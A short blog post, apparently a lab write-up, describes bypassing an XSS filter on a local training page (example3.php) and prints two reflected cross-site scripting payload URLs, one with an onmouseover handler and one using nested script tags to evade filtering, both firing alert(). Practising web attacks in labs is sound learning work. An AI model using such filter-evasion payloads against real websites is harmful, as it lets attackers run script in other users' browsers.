You notified the developer about your bypass. He added more filtering and now
seem to prevent your previous payload. However, he is making a terrible mistake in
his code (which was also present in the previous code)...
Payload
http://192.168.56.101/xss/example3.php?name=Bobby%3Cp%20onmouseover=alert%28%27Dazzl%27%29%3Eer%3C/p%3E
This isn't the way the paper wants you to pop the XSS but I had the payload correct and it wouldn't pop, the correct payload, that should of popped was:
http://192.168.56.101/xss/example3.php?name=Annoying<<script<>script>alert('Dazzler')<</script<>/script>
Which produced this:
If you know why this didn't work, feel free to comment!
No comments:
Post a Comment